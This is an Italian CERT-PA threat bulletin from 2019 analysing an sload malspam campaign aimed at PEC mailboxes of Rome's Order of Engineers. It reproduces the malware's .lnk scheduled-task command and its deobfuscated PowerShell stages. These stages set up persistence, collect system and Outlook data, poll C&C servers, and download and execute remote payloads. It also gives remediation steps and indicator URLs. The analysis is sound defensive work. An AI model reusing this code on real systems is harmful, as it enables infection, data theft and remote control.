Bollettino: Campagna sload indirizzata verso PEC dell Ordine degli Ingegneri di Roma. ID: CERT-PA-B Data: 10/06/2019
|
|
|
- Mariano Marino
- 5 anni fa
- Visualizzazioni
Transcript
1 Bollettino: Campagna sload indirizzata verso PEC dell Ordine degli Ingegneri di Roma ID: CERT-PA-B Data: 10/06/2019 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati dal CERT-PA, al fine di consentire loro di avviare tempestivamente valutazioni di impatto sui propri sistemi informativi e implementare le misure di contrasto/contenimento dei rischi correlati. Il CERT-PA, nell erogare al meglio questo servizio, si avvale di propri fornitori e di fonti pubbliche disponibili in Rete, individuati e selezionati tra i più autorevoli organismi di sicurezza, aziende specializzate e fornitori di tecnologie, al fine di garantire alla comunità di riferimento con la massima accuratezza, affidabilità e tempestività possibile le informazioni utili per la prevenzione e la gestione degli incidenti di sicurezza informatica. Non è consentito far uso di queste informazioni per finalità differenti da quelle sopra indicate. La presenza di rinvii operati mediante tecniche di ipertesto (link) non costituisce una raccomandazione del CERT-PA verso il soggetto richiamato, ma unicamente uno strumento per facilitare il rapido recupero di informazioni utili.
2 Indice Sommario Analisi sample, opportunamente offuscato, con target Ordine degli Ingegneri di Roma... 3 Analisi tecnica del dropper... 4 Primo step... 4 Conclusioni Indicatori di Compromissione Network Url Domain IP File CERT-PA-B
3 CERT-PA-B
4 Sommario Questa sezione contiene l elenco delle minacce oggetto del bollettino. Dalle segnalazioni e dal monitoraggio delle fonti, il CERT-PA riporta le seguenti evidenze: 1. Analisi sample, opportunamente offuscato, con target Ordine degli Ingegneri di Roma Il CERT-PA ha rilevato una campagna di malspam veicolata a partire da martedì 4 giugno 2019, attraverso caselle PEC di strutture pubbliche e private, rivolta verso utenze italiane ed, in particolare, verso caselle di posta riferibili all Ordine degli Ingegneri di Roma. Dal monitoraggio degli eventi connessi alla campagna e dalle analisi svolte su alcuni campioni pervenuti dalla Constituency del CERT-PA ed estrapolati da una contenente un link sono emerse evidenze di particolare interesse in merito alle tecniche di offuscamento utilizzate per occultare il codice. Il sample analizzato si presenta come una variante del noto sload e tra le prime operazioni effettuate vi è l invio delle informazioni relative alla macchina infettata ad una url presumibilmente usata come C&C e la schedulazione di attività di download. CERT-PA-B
5 Analisi tecnica del dropper La campagna di malspam destinata prevalentemente ad account PEC dell Ordine degli Ingegneri di Roma, di cui il CERT-PA ha rilevato le prime evidenze in data 4 giugno 2019, viene veicolata utilizzando numerosi account di posta di tipo PEC precedentemente compromessi. Di seguito uno screenshot della mail: Il link presente nel corpo del messaggio risulta strutturato nel seguente modo: Primo step Seguendo il link viene restituita una risorsa.zip solo se l utente risolve la url da una macchina Windows. È evidente che vengono effettuati controlli sullo User-Agent. La risorsa oggetto della presente analisi è stata scaricata risolvendo la url da una macchina Windows 7 con browser Internet Explorer 11. Il file scaricato ultima-comunicazione-ke zip contiene all interno due file: un pdf innocuo e un file.lnk, rispettivamente denominati: 1. ultima comunicazione.pdf 2. ultima comunicazione.lnk Il file.lnk contiene al suo interno il seguente codice: "C:\Windows\System32\schtasks.exe" /F /Create /TN "AI" /sc minute /MO 2 /ST 07:13 /TR "cmd /c pow%tmp:~5,3%hell -ep bypass -win 1 -c '&{cd %public:~-15,8%\;$y=dir -force -r -in ultima*.z* select -last 1;type -LiteralPath $y select -last 1 %os:~1,1%ex'" CERT-PA-B
6 Come già osservato nel mese di novembre 2018, il file.lnk sfrutta un payload occultato in coda al file ultima-comunicazione-ke zip Il payload completo, estratto dal file zip, è il seguente: $SopDKWK6kvzkAEZVxe43GH=$env:HOMEDRIVE+$env:HOMEPATH+'\AppData\Roaming'; start-process - windowstyle HiDden schtasks '/change /tn AI /disable'; $Wl9zoOttflRFYBBJIWeigPW = (Get- WmiObject Win32_ComputerSystemProduct).UUID; $gluvpybwuxg4wuxpjshprt1=$wl9zoottflrfybbjiweigpw.substring(0,6); $BBXPTeFQuqkZfSbMnJsrFXZ = $SopDKWK6kvzkAEZVxe43GH+'\'+$gLuvPybwuxG4WuxpJShpRT1;If(testpath $BBXPTeFQuqkZfSbMnJsrFXZ"\_in"){$wAQpsmd42xUhTOAwTBZ814hTl = (Get-Date).AddMinutes(- 20);$F2FA6q7Ggx8CKdFi7XbVyIP9=Get-ChildItem -Path $BBXPTeFQuqkZfSbMnJsrFXZ"\_in" Where- Object {$_.LastWriteTime -gt $waqpsmd42xuhtoawtbz814htl ;if ($F2FA6q7Ggx8CKdFi7XbVyIP9){exit;; New-Item -ItemType Directory -Force -Path $BBXPTeFQuqkZfSbMnJsrFXZ;$rr="`$a37VgMdoKpji79rP=""$BBXPTeFQuqkZfSbMnJsrFXZ\sbr_init.ps1" ";`$clpsr='/c bitsadmin /transfer IXbMf58V /download /priority FOREGROUND "" ""'+`$a37vgmdokpji79rp+'""'; start-process -windowstyle HiDden cmd.exe `$clpsr;`$e=1;while(`$e -eq 1){If(test-path `$a37vgmdokpji79rp){`$e=3;start-sleep -s 3;;`$clpsr='/C powershell -w 1 -ep bypass -File '+`$a37vgmdokpji79rp;start-process - windowstyle hidden cmd.exe `$clpsr;";$rr out-file $BBXPTeFQuqkZfSbMnJsrFXZ'\PRhDn5CFglqUJ9wdy144gb.ps1';$5GSm6Jg7lR5aLjPBNgVNvO=' /F /create /sc minute /mo 5 /TN "AppRunLog" /ST 03:30 /TR "powershell.exe -ep bypass -win 1 -file '+$BBXPTeFQuqkZfSbMnJsrFXZ+'\PRhDn5CFglqUJ9wdy144gb.ps1 "'; start-process - windowstyle hidden schtasks $5GSm6Jg7lR5aLjPBNgVNvO CERT-PA-B
7 Viene quindi creata un attività pianificata denominata AI, che verrà eseguita ogni 2 minuti a partire dalle ore 07:13 e che provvederà a prelevare ed eseguire il codice contenuto nel file.zip. Quando il task andrà in esecuzione, il codice powershell provvederà a: disabilitare l attività pianificata con nome AI ; pianificare una nuova attività denominata AppRunLog e contenente una porzione di codice powershell (evidenziata in rosso), che verrà eseguita ogni 5 minuti a partire dalle ore 03:30. All avvio del task AppRunLog verrà scaricato un nuovo codice powershell dalla url indicata nel task: Il nuovo codice powershell servirà a: produrre quattro file: 1. config.ini; 2. web.ini; 3. {random_8chars.vbs; 4. {random_8chars.ps1; disabilitare l attività pianificata AppRunLog ; pianificare una nuova attività utilizzando come nome i primi 6 caratteri del UUID della macchina e configurando l esecuzione ogni 3 minuti a partire dalle ore 07:00. Si evidenziano di seguito le parti salienti del suddetto codice powershell. Powershell codice iniziale $YxUOhkthx2u1MvTYSNj= $env:userprofile+'\appdata\roaming'; $hh='hi'+'dd'+'en'; $i0toajxy5xt44osm=@(1..16); $mdgo7ib = (Get-WmiObject Win32_ComputerSystemProduct).UUID; $BawotfHt8wER3CX=$mDGo7Ib.Substring(0,6); $w1fkt2tffaemsq = $YxUOhkthx2u1MvTYSNj+"\"+$BawotfHt8wER3CX; If(!(test-path $w1fkt2tffaemsq)){new-item -ItemType Directory -Force -Path $w1fkt2tffaemsq If(test-path $w1fkt2tffaemsq"\_in"){$u0wttbaxk7b=get-childitem $w1fkt2tffaemsq"\_in";$be8mkas5 = Get-Date;if ($u0wttbaxk7b.lastwritetime -gt $be8mkas5.addminutes(-30)){break;break;; "1" out-file $w1fkt2tffaemsq"\_in"; $uzj9j = "`r`n" $WBOm6PjZjuAgOHS0S69E= -join ((65..90) + ( ) Get-Random -Count 8 % {[char]$_) CERT-PA-B
8 Poweshell config.ini $2HAT2kVum4XxPk5e+='76492d f b16050a5345MgB8AC8AOQBRADAAcwBXAFQAbgBVADYAQwBNA GYAUgBzAE0AeAAvAEwAe'; $2HAT2kVum4XxPk5e+='gB1AGcAPQA9AHwAYgAwAGIAZQAxAGYAMABkADIANQBjADgAYgA0ADgANQA5AGQAZQBiAD QAMgBmADUAOQAzAGYAMA'; $2HAT2kVum4XxPk5e+='AwAGUANgAzADMANAA0ADQAMgBkADkAMwA0AGMAMgAyADYAMgA5AGEANAA5ADIANAA2AGE AZAAyAGQAZQBiADAAMAA'; $2HAT2kVum4XxPk5e+='5AGUAMwBjAGIAOQAwADcAOAA1AGQAZAA1ADUANAAyAGMANAA2ADcAMQAxADIAZQBmADUA OAAzAGQAMABjAGMAMwA5'; $2HAT2kVum4XxPk5e+='AGIAZgAxAGQAMQBmAGMAOQA2ADUAOQAyADgAMQAzADMAZgBkADEAZgBiADAAZgBmAGYAM wbkagmanaa0adyanwa1a'; $2HAT2kVum4XxPk5e+='DAAZQBmAGQAZQAyAGEAMgBiAGQAMwAyAGEAZgBhADgANgAzADgAMgBhADAANAA4AGYAYg BkADkAMwBlADcAYgAxAG'; -- snip -- $2HAT2kVum4XxPk5e+='AYQA4ADkAOQBmADcAZQA2ADEAMABmADMANQBlADQAMAA1ADMAMQBhADYAYQA0ADkAZAAy AGQAZgAxADAAMgA0AGEA'; $2HAT2kVum4XxPk5e+='NQBkADgANwBkAGQAMAA0ADUAMgBhADMAYgBiAGUAZgA1AGUANABjADUAMgBmADMANwBjA GQAZQBiADAANgA5ADIAM'; $2HAT2kVum4XxPk5e+='wBmADkAOQBjAGMANABhADQAZQA5AGYAZABhADEAMwBjADkAZQBhAGQAYgBkADgAMQA5AG IANABhADIAOQBjAGUAOA'; $2HAT2kVum4XxPk5e+='AyADYAYgBiADMAOABiAGQANABjAGEAMQBhADEANgA='; $2HAT2kVum4XxPk5e out-file $w1fkt2tffaemsq'\config.ini'; Poweshell web.ini $VWZnyAu0MbvwadySN+='76492d f b16050a5345MgB8AGwATwAyAHQAcABJAE'; $VWZnyAu0MbvwadySN+='YASABWACsAUABKAGIAQQBuAGoATgBQADEASAAwAGcAPQA9AHwANgAw'; $VWZnyAu0MbvwadySN+='ADYANABlADgAYwBhAGMAYwAwAGUAOQA5ADUAOAA3AGQANwBkAGQAMg'; $VWZnyAu0MbvwadySN+='AzAGEAOAAwAGUAZgBmAGUAMQA3AGQAMgA3AGQAZQAwAGQAMwAzADIA'; $VWZnyAu0MbvwadySN+='NAAxAGQANgA0ADYANABmAGEANgAyAGMAMAAwAGIAZABmADMAYQBjAD'; $VWZnyAu0MbvwadySN+='IAZQAxADkAOAA4ADEAOQAzAGUAMAAwADcAOAA4ADUANABlADAAOQA3'; $VWZnyAu0MbvwadySN+='ADgANwBlADMAZABkADEAZQBlAGYANQBhAGYANQBhADEAYwBlAGUAMg'; $VWZnyAu0MbvwadySN+='BkAGEAOQBiADIANABkADYAOQAzADIAMwA1AGQAOQA4ADIAMwAyAGYA'; $VWZnyAu0MbvwadySN+='ZAAyAGUAZgA3AGIAMQA1ADgAMABkADcAOQBmAGEANgA1ADgAYwA2AG'; $VWZnyAu0MbvwadySN+='IANgAzAGIAOQBlADYAZQA1ADYAYwAwADIAYwBmADAAZABmADAAOQA0'; $VWZnyAu0MbvwadySN+='AGQANgA1AGYAYgA4ADkAMwAzADkANQA0ADEAMwAxADUAYwA1ADkAMQ'; $VWZnyAu0MbvwadySN+='AyADYANQBhAGEAZgBlADAANAAyAGQAZgA2AGMAZQA4ADEAZAA2ADMA'; $VWZnyAu0MbvwadySN+='MgA4AGUAYwA5ADcAZABhADEAZABiAGQAZQBkAGMANAA4AGIAMgA4AG'; $VWZnyAu0MbvwadySN+='EAOQBkADMAZABkAGEAZAA1ADYAMgA2ADcAMgBhADAAYwA3ADEAOQAy'; $VWZnyAu0MbvwadySN+='ADMAZgA3ADYAYQA2AGMAZAA2ADkAYwA='; $VWZnyAu0MbvwadySN out-file $w1fkt2tffaemsq'\web.ini'; Poweshell {random_8chars.vbs $j7xnbwglffhrt4yjnx+=$uzj9j+'di'; $j7xnbwglffhrt4yjnx+='m '; $j7xnbwglffhrt4yjnx+=' w'; $j7xnbwglffhrt4yjnx+='in'; $j7xnbwglffhrt4yjnx+='ss'; $j7xnbwglffhrt4yjnx+='h'; $j7xnbwglffhrt4yjnx+=$uzj9j+'function RandomStrin'; $j7xnbwglffhrt4yjnx+='g( ByVal strlen )'; $j7xnbwglffhrt4yjnx+=$uzj9j+'dim str, mi'; $j7xnbwglffhrt4yjnx+='n, max'; $j7xnbwglffhrt4yjnx+=$uzj9j+'const LETTERS = "abcdefghijklmnop'; $j7xnbwglffhrt4yjnx+='qrstuvwxyz"'; $j7xnbwglffhrt4yjnx+=$uzj9j+'mi'; -- snip -- CERT-PA-B
9 $j7xnbwglffhrt4yjnx+=$uzj9j+'outfile="'+$w1fkt2tffaemsq+'\"+fname+".bat"' $j7xnbwglffhrt4yjnx+=$uzj9j+'set objfi'; $j7xnbwglffhrt4yjnx+='le = objf'; $j7xnbwglffhrt4yjnx+='so.create'; $j7xnbwglffhrt4yjnx+='textfile('; $j7xnbwglffhrt4yjnx+='outfile,t'; $j7xnbwglffhrt4yjnx+='rue)'; $j7xnbwglffhrt4yjnx+=$uzj9j+'objfile.write "Set "+tguwznduhdjjykvzi+"=rshe" & vbcrlf & "Set "+pofgztpochgavagqw+"=ypa" & vbcrlf & "Set "+EAaLEKv+"=il" & vbcrlf & "powe%"+tguwznduhdjjykvzi+"%ll -ep b%"+pofgztpochgavagqw+"%ss -f%"+eaalekv+"%e '+$w1fkt2tffaemsq+'\'+$wbom6pjzjuagohs0s69e+'.ps1" ' $j7xnbwglffhrt4yjnx+=$uzj9j+'objf'; $j7xnbwglffhrt4yjnx+='ile.'; $j7xnbwglffhrt4yjnx+='clos'; $j7xnbwglffhrt4yjnx+='e'; $j7xnbwglffhrt4yjnx+=$uzj9j+'winss'; $j7xnbwglffhrt4yjnx+='h.run'; $j7xnbwglffhrt4yjnx+=' outf'; $j7xnbwglffhrt4yjnx+='ile,0'; $j7xnbwglffhrt4yjnx+=',true'; $j7xnbwglffhrt4yjnx out-file $w1fkt2tffaemsq'\'$wbom6pjzjuagohs0s69e'.vbs' Poweshell {random_8chars.ps1 $SxSGeLH7SQMJ9T+=$uzj9J+'$xuddftTXln2jGqgi=Get-Process '; $SxSGeLH7SQMJ9T+='-name powershell*;'; $SxSGeLH7SQMJ9T+=$uzj9J+'$NbZ2WG9Pw=$env:use'; $SxSGeLH7SQMJ9T+='rprofile+"\AppData\'; $SxSGeLH7SQMJ9T+='Roaming"; '; $SxSGeLH7SQMJ9T+=$uzj9J+'if ($xuddfttxln2jgqgi.length '; $SxSGeLH7SQMJ9T+='-lt 2){'; $SxSGeLH7SQMJ9T+=$uzj9J+'$yGPfejsszWlxhIzAoZ'; $SxSGeLH7SQMJ9T+='Q = (Get-WmiObject '; $SxSGeLH7SQMJ9T+='Win32_ComputerSyste'; $SxSGeLH7SQMJ9T+='mProduct).UUID ;'; $SxSGeLH7SQMJ9T+='$r=6;' $SxSGeLH7SQMJ9T+=$uzj9J+'$iEShGP'; $SxSGeLH7SQMJ9T+='XQEuMdb'; $SxSGeLH7SQMJ9T+='Ctp=$yG'; $SxSGeLH7SQMJ9T+='Pfejssz'; $SxSGeLH7SQMJ9T+='WlxhIzA'; $SxSGeLH7SQMJ9T+='oZQ.Sub'; $SxSGeLH7SQMJ9T+='string('; $SxSGeLH7SQMJ9T+='0,$r);'; $SxSGeLH7SQMJ9T+=$uzj9J+'$WSvSd29VCJkCA1VeUc'; $SxSGeLH7SQMJ9T+='V = $NbZ2WG9Pw+"\"+'; $SxSGeLH7SQMJ9T+='$iEShGPXQEuMdbCtp;'; $SxSGeLH7SQMJ9T+=$uzj9J+'$aLpFyCRa5h629CUm=@'; $SxSGeLH7SQMJ9T+='(1..16);'; $SxSGeLH7SQMJ9T+=$uzj9J+'$ff="co"+"nf"+"ig."+'; $SxSGeLH7SQMJ9T+='"ini"'; $SxSGeLH7SQMJ9T+=$uzj9J+'$3ihNCUnEP'; $SxSGeLH7SQMJ9T+='By2wjd= Ge'; -- snip -- $SxSGeLH7SQMJ9T+='ervic'; $SxSGeLH7SQMJ9T+='es.Ma'; $SxSGeLH7SQMJ9T+='rshal'; $SxSGeLH7SQMJ9T+=']::Se'; $SxSGeLH7SQMJ9T+='cureS'; $SxSGeLH7SQMJ9T+='tring'; $SxSGeLH7SQMJ9T+='ToBST'; $SxSGeLH7SQMJ9T+='R($IS'; CERT-PA-B
10 $SxSGeLH7SQMJ9T+='RlK2r'; $SxSGeLH7SQMJ9T+='18);'; $SxSGeLH7SQMJ9T+=$uzj9J+'$scGuJZ = [System.Runtime.InteropServices.Marshal]::PtrToStri'; $SxSGeLH7SQMJ9T+='ngAuto($bKnxpqQHdsCA);'; $SxSGeLH7SQMJ9T+=$uzj9J+'Invok'; $SxSGeLH7SQMJ9T+='e-Exp'; $SxSGeLH7SQMJ9T+='ressi'; $SxSGeLH7SQMJ9T+='on $s'; $SxSGeLH7SQMJ9T+='cGuJZ'; $SxSGeLH7SQMJ9T+=';'; $SxSGeLH7SQMJ9T out-file $w1fkt2tffaemsq'\'$wbom6pjzjuagohs0s69e'.ps1' Poweshell disabilita task AppRunLog start-process -windowstyle $hh schtasks '/change /tn AppRunLog /disable'; Poweshell pianifica nuovo task (UUID) $1sqp10U2N5yj=' /F /create /sc minute /mo 3 /TN "U'+$BawotfHt8wER3CX+'" /ST 07:00 /TR "'+$w1fkt2tffaemsq+'\'+$wbom6pjzjuagohs0s69e+'.vbs '+$U8opusm1hG6w+'"'; start-process -windowstyle $hh schtasks $1sqp10U2N5yj; Il nuovo task eseguirà lo script.vbs che avrà il compito di generare un file.bat che a sua volta si occuperà di eseguire il file.ps1 salvato localmente. Vbs file Dim winssh Function RandomString( ByVal strlen ) Dim str, min, max Const LETTERS = "abcdefghijklmnopqrstuvwxyz" min = 1 max = Len(LETTERS) Randomize For i = 1 to strlen str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 ) Next RandomString = str End Function Set objfso=createobject("scripting.filesystemobject") Set winssh = WScript.CreateObject ("WScript.Shell") fname=randomstring(10) tguwznduhdjjykvzi=randomstring(4) pofgztpochgavagqw=randomstring(4) EAaLEKv=RandomString(4) outfile="+$w1fkt2tffaemsq\"+fname+".bat" Set objfile = objfso.createtextfile(outfile,true) objfile.write "Set "+tguwznduhdjjykvzi+"=rshe" & vbcrlf & "Set "+pofgztpochgavagqw+"=ypa" & vbcrlf & "Set "+EAaLEKv+"=il" & vbcrlf & "powe%"+tguwznduhdjjykvzi+"%ll -ep b%"+pofgztpochgavagqw+"%ss -f%"+eaalekv+"%e +$w1fkt2tffaemsq\+$wbom6pjzjuagohs0s69e.ps1" CERT-PA-B
11 objfile.close winssh.run outfile,0,true Il file {random_8chars.ps1, una volta eseguito, provvederà a decifrare il file config.ini utilizzando ConvertTo-SecureString con chiave pari alla successione numerica da 1 a 16. PS1 file $xuddfttxln2jgqgi=get-process -name powershell*; $NbZ2WG9Pw=$env:userprofile+"\AppData\Roaming"; if ($xuddfttxln2jgqgi.length -lt 2){ $ygpfejsszwlxhizaozq = (Get-WmiObject Win32_ComputerSystemProduct).UUID ; $r=6; $ieshgpxqeumdbctp=$ygpfejsszwlxhizaozq.substring(0,$r); $WSvSd29VCJkCA1VeUcV = $NbZ2WG9Pw+"\"$iEShGPXQEuMdbCtp; $alpfycra5h629cum=@(1..16); $ff="co"+"nf"+"ig.""ini" $3ihNCUnEPBy2wjd= Get-Content $WSvSd29VCJkCA1VeUcV"\\"$ff; $ISRlK2r18= ConvertTo-SecureString $3ihNCUnEPBy2wjd -key $alpfycra5h629cum; $bknxpqqhdsca = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($ISRlK2r18); $scgujz = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($bKnxpqQHdsCA); Invoke-Expression $scgujz; La decifratura del file config.ini produce un ulteriore codice powershell: Powershell da config.ini $t=ping ; if ($t -match "Request timed out"){stop-process -name powershell* $mainkey=@(1..16); $mortyway=$env:userprofile+'\ap'+'pdata\ro'+'aming'; $tp=2400; $rr=6; $froodspace = (Get-WmiObject Win32_ComputerSystemProduct); $frood=$froodspace.uuid; $roccon=$frood.substring(0,$rr); $starslord = $mortyway+"\"+$roccon; $btlog=$starslord+'\btc.log'; $timel=$starslord+'\ping.ini'; $ifn=(get-process select -first 1 ).name; $pp=$starslord+'\'+$ifn+'.log'; if ($ifn -eq ""){stop-process -name powershell* try{ Remove-Item $starslord'\sbr_*'catch{ try{ Remove-Item $starslord"\*.jpg";catch{ try{ Remove-Item $starslord"\*.log";catch{ try{ Remove-Item $starslord"\*.bat";catch{ if(![system.io.file]::exists($pp)){ "0" out-file $pp; $maindmc = "cmd"; $clpsr='/c bitsadmin /reset'; CERT-PA-B
12 $Secure= Get-Content $starslord"\web.ini"; $Encrypted= ConvertTo-SecureString $Secure -key $mainkey; $slstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted); $rstr = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($slStr); $d=$rstr -split "," For ($i=0; $i -le $d.length-1; $i++){ if ($d[$i] -match "http"){ $rp= -join ((65..90) + ( ) Get-Random -Count 8 % {[char]$_) $d[$i] out-file -append $btlog; $pp=$starslord+'\'+$i+'_'+$ifn+'.log'; $clpsr='/c bitsadmin /transfer '+$rp+' /download /priority FOREGROUND "'+$d[$i]+'/ca'+'pt'+'cha.p'+'hp?ch=1" '+$pp; $clpsr out-file -append $btlog $e=1;$dd=0; while($e -eq 1){ $ad=2; For ($i=0; $i -le $d.length-1; $i++){ $pp=$starslord+'\'+$i+'_'+$ifn+'.log'; if([system.io.file]::exists($pp)){ $line=get-content $pp if ($line -eq "sok"){ $did=$i; $ad=1; $dd++; if ($dd -gt 60) { $outu=""; For ($i=0; $i -le $d.length-1; $i++){ if ($d[$i] -match "http"){ $l=$d[$i].split(".")[0] -replace "[^0-9]", ''; $p=$d[$i].split(".")[1] -replace "[^A-Z/]", ''; $n=[int]$l+1; $r1=$l+'.'+$p; if ($n -gt 30){ $n=""; $r2=[string]$n+'.'+$p; $outu+=$d[$i]+"," -replace $r1, $r2 $Secure = ConvertTo-SecureString $outu -AsPlainText -Force $Encrypted = ConvertFrom-SecureString -SecureString $Secure -key $mainkey $Encrypted out-file $starslord"\web.ini"; stop-process -name powershell* if ($ad -eq 1){ $e=2; Start-Sleep -s 5 $outd=""; $dd=get-wmiobject -Class Win32_LogicalDisk Where-Object {$_.Description -match 'Network' Select-Object ProviderName,DeviceID; try{ if ($dd ){for ($i=0; $i -le $dd.length; $i++){$outd=$outd+'{'+$dd[$i].deviceid+''+$dd[$i].providername+''; catch { try{ if ($dd -and $outd -eq "" ){$outd='{'+$dd[$i].deviceid+''+$dd.providername+'';catch { try{ $nw=$starslord+'\_nw'; CERT-PA-B
13 $nr=$starslord+'\_nr'; $clpsr='/c net view > '+$nw+' & copy '+$nw+' '+$nr+' & exit'; $e=1;while($e -eq 1){If(test-path $nr){$e=3;start-sleep -s 3; $l=get-content $nr; $gk=$l -match '\\'; if ($gk -and $gk.length -gt 1){ $outd=$outd+'{in net:'+$gk.length+''; remove-item $nr catch{ $cp=get-wmiobject win32_processor select Name; try{ if ($cp.length -gt 0){ $cpu=$cp[0].name else{$cpu=$cp.name catch { try{$v1=(gwmi win32_operatingsystem).caption catch { $fmail=""; if (test-path $starslord"\..\microsoft\outlook\"){ $ot=1; $ost=gci $env:userprofile'\appdata\local\microsoft\outlook\' -filter "*.ost" ForEach($ert in $ost){$fmail+="*"+$ert.name -replace '.ost',''; else{$ot=0; try {$lnk=([system.uri]$d[$did]).hostcatch{ $s=0; while($true){ $out=""; $tt=get-process Select-Object name for ($i=0; $i -le $tt.length-1; $i++){ $out=$out+"*"+$tt[$i].name; $pp=$starslord+'\'+$ifn+'.log'; if([system.io.file]::exists($pp)){ $line=get-content $pp; $rp= -join ((65..90) + ( ) Get-Random -Count 8 % {[char]$_) if ($line -match "run="){ "0" out-file $pp; $u=$line -replace 'run=',''; $clpsr="/c powershell.exe -command iex ((new-object ('NEt.WeBclient')).('DowNLoAdStrInG').invoKe(('"+$u+"')))"; elseif ($line -match "sbr="){ "0" out-file $pp; $u=$line -replace 'sbr=',''; $pp=$starslord+'\sbr_'+$rp+'.ps1'; $clpsr='/c bitsadmin /transfer '+$rp+' /download /priority normal '+$u+' "'+$pp+'"'; $e=1;while($e -eq 1){If(test-path $pp){$e=3;start-sleep -s 3; $clpsr='/c powershell -win HiddeN -ep bypass -File "'+$pp+'"'; elseif ($line.length -gt 3){ "0" out-file $pp; $dpath = [Environment]::GetFolderPath("MyDocuments") $jerry=$starslord+'\'+$roccon+'_'+$rp; $clpsr='/c bitsadmin /transfer '+$rp+' /download /priority FOREGROUND '+$line+' '+$jerry+'.txt & Copy /Z '+$jerry+'.txt '+$jerry+'_1.txt & certutil -decode '+$jerry+'_1.txt '+$dpath+'\'+$roccon+'_'+$rp+'.exe & powershell -command "start-process '+$dpath+'\' +$roccon+'_'+$rp+'.exe" & exit'; $clpsr='/c del '+$jerry+'.txt & del '+$jerry+'_1.txt & del '+$dpath+'\'+$roccon+'_'+$rp+'.exe & exit'; CERT-PA-B
14 $line=get-content $pp; if ($line -eq "0"){ $clpsr='/c bitsadmin /transfer '+$rp+' /download /priority FOREGROUND "'+$d[$did]+'captcha.php?lnk='+$lnk+'&s='+$s+'&g=x2401&id='+$frood+'&v='+$v1+'&c='+$rp+'& a='+$out+'&fm='+$fmail+'&d='+$outd+'&n='+$env:computername+'&cpu='+$cpu+'&o='+$ot+'" '+$pp+' > '+$ btlog+' & exit '; if([system.io.file]::exists($btlog)){ $e=0; foreach($line in Get-Content $btlog -Encoding UTF8) { if ($line -match "ERROR"){ $e++; if ($e -gt 0 ){ $clpsr='/c bitsadmin /reset & exit'; stop-process -name powershell* if([system.io.file]::exists($timel)){$tp=get-content $timel; try {if ([int]$tp -lt 5){$tp=2400; catch{$tp=2400; Start-Sleep -s $tp; $s++; CERT-PA-B
15 Il file config.ini, che una volta decifrato restituisce il codice powershell di cui sopra, rappresenta il cuore del malware. Una volta avviato esegue una serie di operazioni tra cui: un ping verso l ip: termina i processi powershell se riceve come risposta Request timed out e le operazioni riprenderanno al prossimo avvio del task pianificato; ripulisce la macchina infetta da eventuali file jpg, log, bat o sbr_* posizionati sotto la cartella locale AppData\Roaming Decifra il file web.ini da cui otterrà la lista dei C&C Utilizza bitsadmin per puntare al file captcha.php?ch=1 di uno dei domini presenti nella lista dei C&C recuperata dal file web.ini Il risultato di quest ultima operazione verrà salvato all interno di un file di log. Se la risposta ricevuta è sok verrà memorizzato l indirizzo di C&C che ha prodotto la risposta. Questo verrà utilizzato per selezionare un C&C attivo e, qualora non ve ne fossero di disponibili (dopo 60 tentativi effettuati a distanza di 5 secondi), lo script utilizzerà dei C&C generati sequenzliamente a partire da quelli appena utilizzati (incrementando o aggiungendo un eventuale numero al nome host). Lo script powershell (ex config.ini) recupera e memorizza informazioni relative alla macchina compromessa: ComputerName, CPU, Sistema Operativo e i file.ost (Offline Storage Table di Outllook) eventualmente presenti. Se la risposta ricevuta inizia per run= verrà presa in considerazione la url a seguire la stringa run= e invocata tramite iex ((new-object ('NEt.WeBclient')).('DowNLoAdStrInG').invoKe Se la risposta ricevuta inizia per sbr= verrà presa in considerazione la url a seguire la stringa sbr= e invocata tramite bitsadmin Se la risposta contiene una stringa diversa dalle precedenti ma di una lunghezza maggiore di 3 caratteri verrà scaricato un file codificato in base64 e salvato in locale come.txt, successivamente il file verrà decodificato e salvato con estensione.exe ed infine eseguito. Se la risposta è 0 le informazioni raccolte precedentemente verranno inviate al C&C CERT-PA-B
16 Conclusioni Come ampiamento discusso nei paragrafi precedenti, la campagna malevola sembra avere come target le caselle PEC degli iscritti all Ordine degli Ingegneri di Roma. Nel caso in cui sia stato contratto il malware è possibile tentare di rimuoverlo effettuando le seguenti azioni di remediation: Rimuovere innanzitutto l archivio zip scaricato; Controllare le attività pianificate di windows digitando taskschd.msc in start esegui o schtasks.exe nel prompt dei comandi (cmd), o dalle utilità di sistema all interno del menu start; Rimuovere eventuali cartelle sospette aventi una nomenclatura di tipo alfanumerica e di lunghezza pari a 6 caratteri (es F) presenti all interno del percorso C:\Users\ancestor\AppData\Roaming CERT-PA-B
17 CERT-PA-B Indicatori di Compromissione Network Url https[:]//safariarmy[.]com/documento_certificato/ https[:]//olxtree[.]com/documento_certificato/ https[:]//webberwebsites[.]com/documento_certificato/ https[:]//easthamorg[.]com/documento_certificato/ https[:]//webshops-linux[.]com/documento_certificato/ https[:]//phunctions[.]com/documento_certificato/ https[:]//condosforrentinorlando[.]com/documento_certificato/ https[:]//worker[.]compemployersolutions[.]com/documento_certificato/ https[:]//berkeleytaylorconsultants[.]com/documento_certificato/ https[:]//petperksandstuff[.]com/documento_certificato/ https[:]//techlobby[.]com/documento_certificato/ https[:]//invicta-osrs[.]com/documento_certificato/ https[:]//thecannabismarketer[.]com/documento_certificato/ https[:]//myvahine[.]com/documento_certificato/ https[:]//moresaleswithai[.]com/documento_certificato/ https[:]//nvshenye[.]com/documento_certificato/ https[:]//nycloot[.]com/documento_certificato/ https[:]//consciousrevolutionist[.]com/fvdrjuytiy45dty/csdvtrehyt56 https[:]//thetomatokitchen[.]com/documento_certificato/ https[:]//mtgrush[.]com/documento_certificato/ https[:]//firstchoicebarhire[.]com/documento_certificato/ https[:]//sharkfuckers[.]com/documento_certificato/ https[:]//larvooper.me/images/ https[:]//nrefg.eu/images/ https[:]//kofeservis[.]com/keripalsinavot/diopalsyta.ps1 https[:]//jhkfhbfr.eu/images/captcha.php?lnk=jhkfhbfr.eu&s=0&g=x2401 https[:]//jhkfhbfr.eu/images/captcha.php?ch=1 https[:]//awrvip.eu/images/captcha.php?lnk=jhkfhbfr.eu&s=0&g=x2401 https[:]//awrvip.eu/images/captcha.php?ch=1 https[:]//implantrefer[.]com/documento_certificato/ https[:]//ta-meyer[.]com/documento_certificato/ Domain safariarmy.com olxtree.com webberwebsites.com
